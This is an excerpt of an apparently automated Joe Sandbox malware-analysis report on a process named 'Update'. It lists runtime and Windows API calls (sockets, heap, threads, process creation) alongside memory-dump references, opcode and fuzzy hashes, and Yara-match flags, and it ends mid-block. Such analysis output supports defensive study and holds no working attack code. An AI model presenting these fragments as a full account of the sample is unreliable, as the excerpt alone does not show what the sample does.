                                                                                                • Instruction Fuzzy Hash: FA41C471A00605EFEB10EFA4CC89FAAB7A8FF15714F044395EA159B3C0E7759A40CB91
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6CA84CD5
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6CA84CEF
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA84D10
                                                                                                • __Getctype.LIBCPMT ref: 6CA84DC4
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA84DF7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                • String ID:
                                                                                                • API String ID: 3087743877-0
                                                                                                • Opcode ID: b4f75f1dcb70a15ad1337965736d5efd84cc03eaf76cbfb743969606cbc9ebb7
                                                                                                • Instruction ID: 71b0c6d31385aaa0ee28190dff206b90d34590caf4432c06c72bb3b0e8f89601
                                                                                                • Opcode Fuzzy Hash: b4f75f1dcb70a15ad1337965736d5efd84cc03eaf76cbfb743969606cbc9ebb7
                                                                                                • Instruction Fuzzy Hash: CB418A71E012258FCB14DF98C955B9EBBF5FF44718F088119D859ABB40E734AA89CB90
                                                                                                APIs
                                                                                                • recv.WS2_32(?,?,00000598,00000000), ref: 037F3CBF
                                                                                                • SetLastError.KERNEL32(00000000,?,?,037F399F,?,?,00000000,000000FF,00000000), ref: 037F3CFA
                                                                                                • GetLastError.KERNEL32(00000000), ref: 037F3D45
                                                                                                • WSAGetLastError.WS2_32(?,?,037F399F,?,?,00000000,000000FF,00000000), ref: 037F3D7B
                                                                                                • WSASetLastError.WS2_32(0000000D,?,?,037F399F,?,?,00000000,000000FF,00000000), ref: 037F3DA2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$recv
                                                                                                • String ID:
                                                                                                • API String ID: 316788870-0
                                                                                                • Opcode ID: 0c4f5ec4c4396871ce82087f05ec055ef735288fff7e4c3c97ccd4d24bd93821
                                                                                                • Instruction ID: f02f26a69eeb009bccdfa85c33ae304cd72720d599be9af7c38504b46adb08f1
                                                                                                • Opcode Fuzzy Hash: 0c4f5ec4c4396871ce82087f05ec055ef735288fff7e4c3c97ccd4d24bd93821
                                                                                                • Instruction Fuzzy Hash: 0631B17A6042008FFB64DF68D8C8B6A77ADFB85324F1505A6EF09DB389D731D881CA51
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 03800EF9
                                                                                                  • Part of subcall function 037FF673: __FF_MSGBANNER.LIBCMT ref: 037FF68C
                                                                                                  • Part of subcall function 037FF673: __NMSG_WRITE.LIBCMT ref: 037FF693
                                                                                                  • Part of subcall function 037FF673: RtlAllocateHeap.NTDLL(00000000,00000001,74DEDFF0,00000000,00000000,?,03804500,?,74DEDFF0,00000000,?,038081D6,00000000,?,?,?), ref: 037FF6B8
                                                                                                • _free.LIBCMT ref: 03800F0C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_free_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 1020059152-0
                                                                                                • Opcode ID: 7661ecbdecd44804900ebe91135dcd1b6b67fbf6300ee8c43cad8aa577c51caa
                                                                                                • Instruction ID: 7788e61c05a08fdc8a390ac46aa1c46de1fc6ae719272740cc9625e284f2f8bc
                                                                                                • Opcode Fuzzy Hash: 7661ecbdecd44804900ebe91135dcd1b6b67fbf6300ee8c43cad8aa577c51caa
                                                                                                • Instruction Fuzzy Hash: 3E11E776808B19AFCB61FFB4AC0875E7759AF403B0B1444E6E949DF2D0DE308540A794
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 1000E5E5
                                                                                                  • Part of subcall function 10006E83: __FF_MSGBANNER.LIBCMT ref: 10006E9C
                                                                                                  • Part of subcall function 10006E83: __NMSG_WRITE.LIBCMT ref: 10006EA3
                                                                                                  • Part of subcall function 10006E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006EC8
                                                                                                • _free.LIBCMT ref: 1000E5F8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_free_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 1020059152-0
                                                                                                • Opcode ID: 073510cd7888ec162256f41c4b27844541b3ac2ad2a228e050a5b5aba56439fd
                                                                                                • Instruction ID: 99b6cfc0e9903126c7bed8e87128f69c37c5ff73db012c927cbf40cb5b0e6f66
                                                                                                • Opcode Fuzzy Hash: 073510cd7888ec162256f41c4b27844541b3ac2ad2a228e050a5b5aba56439fd
                                                                                                • Instruction Fuzzy Hash: 2F113A36900A61ABFB229BB4BC0564E37D5FF443F1B214525F848BB198DF36DD404B94
                                                                                                APIs
                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 037F2C3F
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 037F2C55
                                                                                                • TranslateMessage.USER32(?), ref: 037F2C64
                                                                                                • DispatchMessageW.USER32(?), ref: 037F2C6A
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 037F2C78
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                • String ID:
                                                                                                • API String ID: 2015114452-0
                                                                                                • Opcode ID: acedf90b80d6d002c941a4656d6538b1a410208fef9862587fe7595bb7566cf6
                                                                                                • Instruction ID: b7daced23c9356a27a0183da3579496c690680551d467ea175292ad6a364ece0
                                                                                                • Opcode Fuzzy Hash: acedf90b80d6d002c941a4656d6538b1a410208fef9862587fe7595bb7566cf6
                                                                                                • Instruction Fuzzy Hash: 8701F936A5430DBAE710E6A49C81FFEF7ACBB04B10F104941FB04EA1C5DAA5E801D7B8
                                                                                                APIs
                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 10002BFF
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 10002C15
                                                                                                • TranslateMessage.USER32(?), ref: 10002C24
                                                                                                • DispatchMessageW.USER32(?), ref: 10002C2A
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 10002C38
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                • String ID:
                                                                                                • API String ID: 2015114452-0
                                                                                                • Opcode ID: dbe9700d19ae9a12251f89c422866142aee7b4545ced7af6ef9db51ab6727882
                                                                                                • Instruction ID: 0e3c485fe407bbf507bfa30b8d40781191f7ce2fd7dbe990fe93c7e11cc8c17a
                                                                                                • Opcode Fuzzy Hash: dbe9700d19ae9a12251f89c422866142aee7b4545ced7af6ef9db51ab6727882
                                                                                                • Instruction Fuzzy Hash: 8901A972A80319F6F610EB948D91FAE736CEB04B91F504511FF04EE0D9DAB1E80587B4
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 037F4B83
                                                                                                • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 037F4B8D
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 037F4BA0
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 037F4BA3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                • String ID:
                                                                                                • API String ID: 3168844106-0
                                                                                                • Opcode ID: b5f28771c0962748a49700bacbca08f8e87ea000c40329de9c7151849163a87d
                                                                                                • Instruction ID: 6e46fe61debd083a7c9d4e775c4fa894ab032e87f20b24993ed399ecb7cd8b2e
                                                                                                • Opcode Fuzzy Hash: b5f28771c0962748a49700bacbca08f8e87ea000c40329de9c7151849163a87d
                                                                                                • Instruction Fuzzy Hash: D2012C766006149FD720EB7AFCC4B5BF7ECEB88364F0549A9E64683604C775E8458A60
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 10004B63
                                                                                                • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 10004B6D
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 10004B80
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 10004B83
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                • String ID:
                                                                                                • API String ID: 3168844106-0
                                                                                                • Opcode ID: 3c4cb16bca3ae15824b6f58c01f312d0d5f5bcc1af3ff3d380ee54a514ce913b
                                                                                                • Instruction ID: aa03fd3e3b24d4ff679a20f9d9d19219b814eae2566e95c25fa4737bddb7a95c
                                                                                                • Opcode Fuzzy Hash: 3c4cb16bca3ae15824b6f58c01f312d0d5f5bcc1af3ff3d380ee54a514ce913b
                                                                                                • Instruction Fuzzy Hash: 4A0184765006109FE310DB75ECC8B9BB3E8EB8C355F064819E10687100C735FC458AA4
                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 6CA9B2D6
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6CA9B2E1
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA9B34F
                                                                                                  • Part of subcall function 6CA9B1D8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CA9B1F0
                                                                                                • std::locale::_Setgloballocale.LIBCPMT ref: 6CA9B2FC
                                                                                                • _Yarn.LIBCPMT ref: 6CA9B312
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                • String ID:
                                                                                                • API String ID: 1088826258-0
                                                                                                • Opcode ID: 5dc2ae7a93eba2cc10063159a22d5311b27571120ca25d448a96795521d9b8dd
                                                                                                • Instruction ID: af2975ea7e510dca715cbbb1494f1e9e90135e491ffb5490ba94d624b8e70ed6
                                                                                                • Opcode Fuzzy Hash: 5dc2ae7a93eba2cc10063159a22d5311b27571120ca25d448a96795521d9b8dd
                                                                                                • Instruction Fuzzy Hash: B701D435A106229BCB09EB20D90A6BD77F2BF81648B148109D81167B80CF345F8BCBC5
                                                                                                APIs
                                                                                                • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 037F2D5C
                                                                                                • CancelIo.KERNEL32(?), ref: 037F2D66
                                                                                                • InterlockedExchange.KERNEL32(00000000,00000000), ref: 037F2D6F
                                                                                                • closesocket.WS2_32(?), ref: 037F2D79
                                                                                                • SetEvent.KERNEL32(00000001), ref: 037F2D83
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                • String ID:
                                                                                                • API String ID: 1486965892-0
                                                                                                • Opcode ID: b29f964b3b49fd48859670672b96918e514558d0acfa23f08b347a0c2e5d48a7
                                                                                                • Instruction ID: a5d58a2df97a59539546cd31d1b6a793dce0ea39be951cdce6f61431f9a6f70d
                                                                                                • Opcode Fuzzy Hash: b29f964b3b49fd48859670672b96918e514558d0acfa23f08b347a0c2e5d48a7
                                                                                                • Instruction Fuzzy Hash: B1F03C76100B04ABD324EF54ED49F66B7BCFB89B11F100A5DF69696684C6B4B5088BA0
                                                                                                APIs
                                                                                                • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00C72D13
                                                                                                • CancelIo.KERNEL32(?), ref: 00C72D1D
                                                                                                • InterlockedExchange.KERNEL32(00000000,00000000), ref: 00C72D26
                                                                                                • closesocket.WS2_32(?), ref: 00C72D30
                                                                                                • SetEvent.KERNEL32(00000001), ref: 00C72D3A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3509855269.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_c70000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                • String ID:
                                                                                                • API String ID: 1486965892-0
                                                                                                • Opcode ID: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
                                                                                                • Instruction ID: d46d94f7805c44196b4ebb837d5e3d653f746ec5cb3ec5178d202dd975663aed
                                                                                                • Opcode Fuzzy Hash: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
                                                                                                • Instruction Fuzzy Hash: 33F04F76100710EFE330DB94CC89F5677B8FB49B12F148658FA969B690C6B1F904CBA0
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 03805012
                                                                                                  • Part of subcall function 03803E5B: __getptd_noexit.LIBCMT ref: 03803E5E
                                                                                                  • Part of subcall function 03803E5B: __amsg_exit.LIBCMT ref: 03803E6B
                                                                                                • __getptd.LIBCMT ref: 03805029
                                                                                                • __amsg_exit.LIBCMT ref: 03805037
                                                                                                • __lock.LIBCMT ref: 03805047
                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0380505B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                • String ID:
                                                                                                • API String ID: 938513278-0
                                                                                                • Opcode ID: 0d139a52ee1cbefd047c21936e96a6f29297b9b6df52a37f650ad1601f980284
                                                                                                • Instruction ID: 89c444f1f38ce97f34f3c44958bccdde81a884c2de644cc4331d1e08afcd20eb
                                                                                                • Opcode Fuzzy Hash: 0d139a52ee1cbefd047c21936e96a6f29297b9b6df52a37f650ad1601f980284
                                                                                                • Instruction Fuzzy Hash: 7FF06D7A948700DBDBE5FBED9D02B4D63A4AF41B20F1502C9D615EF2C0CB6454418EA7
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 1000E14B
                                                                                                  • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                                                  • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                                                • __getptd.LIBCMT ref: 1000E162
                                                                                                • __amsg_exit.LIBCMT ref: 1000E170
                                                                                                • __lock.LIBCMT ref: 1000E180
                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 1000E194
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                • String ID:
                                                                                                • API String ID: 938513278-0
                                                                                                • Opcode ID: 0522d91088f6fb7310532faddd65fc2dc9ce4b376bceba7dbe74de096dd3a9dc
                                                                                                • Instruction ID: 612b0c8b07e52b5ee846fa9c2d173a4fa9df34f322aac77c2402261cad3e7578
                                                                                                • Opcode Fuzzy Hash: 0522d91088f6fb7310532faddd65fc2dc9ce4b376bceba7dbe74de096dd3a9dc
                                                                                                • Instruction Fuzzy Hash: 59F090369446249BF721EBB8980278D32F0EF40BE0F118149F494771DACB74AD40CA56
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 037FC932
                                                                                                • GetCommandLineW.KERNEL32 ref: 037FC938
                                                                                                • GetStartupInfoW.KERNEL32(?), ref: 037FC947
                                                                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 037FC96F
                                                                                                • ExitProcess.KERNEL32 ref: 037FC977
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                • String ID:
                                                                                                • API String ID: 3421218197-0
                                                                                                • Opcode ID: ab233291c0b6141373087516d23201f9706910f55623396eb8c5ab96e3eb80fc
                                                                                                • Instruction ID: 0802506782188209cd5da3650f844cc55ce50344b8ff07aba7fd2b6fce081c4c
                                                                                                • Opcode Fuzzy Hash: ab233291c0b6141373087516d23201f9706910f55623396eb8c5ab96e3eb80fc
                                                                                                • Instruction Fuzzy Hash: 67F03071684318BBEB60EBA4DC4DFEA777CFB04B10F1006D4B619A60D4DA706A44CB54
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 037F75D2
                                                                                                • GetCommandLineW.KERNEL32 ref: 037F75D8
                                                                                                • GetStartupInfoW.KERNEL32(?), ref: 037F75E7
                                                                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 037F760F
                                                                                                • ExitProcess.KERNEL32 ref: 037F7617
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                • String ID:
                                                                                                • API String ID: 3421218197-0
                                                                                                • Opcode ID: 9eb107f24f710ea7405d6996194bf3d22f49cb46278842b464fc026bf540dcf5
                                                                                                • Instruction ID: 79f57f856387389fb8753bffff1c986b4f86857a8c6c9c442ae6eef347eb3f60
                                                                                                • Opcode Fuzzy Hash: 9eb107f24f710ea7405d6996194bf3d22f49cb46278842b464fc026bf540dcf5
                                                                                                • Instruction Fuzzy Hash: 1EF03A71684319BBEB20EBA4DC4DF9977BCFB04B10F2006E4B619AA0C4EA706A44CB54
                                                                                                APIs
                                                                                                  • Part of subcall function 03801CD0: _doexit.LIBCMT ref: 03801CDC
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 037FF9CA
                                                                                                  • Part of subcall function 03803CA0: TlsGetValue.KERNEL32(00000000,03803DF9,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D,03816340,00000008,03803FFF), ref: 03803CA9
                                                                                                  • Part of subcall function 03803CA0: DecodePointer.KERNEL32(?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D,03816340,00000008,03803FFF,00000000), ref: 03803CBB
                                                                                                  • Part of subcall function 03803CA0: TlsSetValue.KERNEL32(00000000,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D,03816340,00000008,03803FFF,00000000), ref: 03803CCA
                                                                                                • ___fls_getvalue@4.LIBCMT ref: 037FF9D5
                                                                                                  • Part of subcall function 03803C80: TlsGetValue.KERNEL32(?,?,037FF9DA,00000000), ref: 03803C8E
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 037FF9E8
                                                                                                  • Part of subcall function 03803CD4: DecodePointer.KERNEL32(?,?,?,037FF9ED,00000000,?,00000000), ref: 03803CE5
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 037FF9F1
                                                                                                • ExitThread.KERNEL32 ref: 037FF9F8
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 037FF9FE
                                                                                                • __freefls@4.LIBCMT ref: 037FFA1E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                • String ID:
                                                                                                • API String ID: 781180411-0
                                                                                                • Opcode ID: 3d3b777091ecf3bb6c501918c2fe942e19cb63cd7c2a7d6efa76b581e2eabef9
                                                                                                • Instruction ID: dbbc7789449935ea4178da80af0560e975852f27c7563ba9b997a16497e4359d
                                                                                                • Opcode Fuzzy Hash: 3d3b777091ecf3bb6c501918c2fe942e19cb63cd7c2a7d6efa76b581e2eabef9
                                                                                                • Instruction Fuzzy Hash: 8DE04F3DA017197BCB50F7F98D0C84EBA1CAD01181F1404C0FA14DB180DE64D51187A7
                                                                                                APIs
                                                                                                  • Part of subcall function 100082F0: _doexit.LIBCMT ref: 100082FC
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 100071BC
                                                                                                  • Part of subcall function 10009754: TlsGetValue.KERNEL32(00000000,100098AD,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000), ref: 1000975D
                                                                                                  • Part of subcall function 10009754: DecodePointer.KERNEL32(?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA,0000000D), ref: 1000976F
                                                                                                  • Part of subcall function 10009754: TlsSetValue.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 1000977E
                                                                                                • ___fls_getvalue@4.LIBCMT ref: 100071C7
                                                                                                  • Part of subcall function 10009734: TlsGetValue.KERNEL32(?,?,100071CC,00000000), ref: 10009742
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 100071DA
                                                                                                  • Part of subcall function 10009788: DecodePointer.KERNEL32(?,?,?,100071DF,00000000,?,00000000), ref: 10009799
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 100071E3
                                                                                                • ExitThread.KERNEL32 ref: 100071EA
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 100071F0
                                                                                                • __freefls@4.LIBCMT ref: 10007210
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
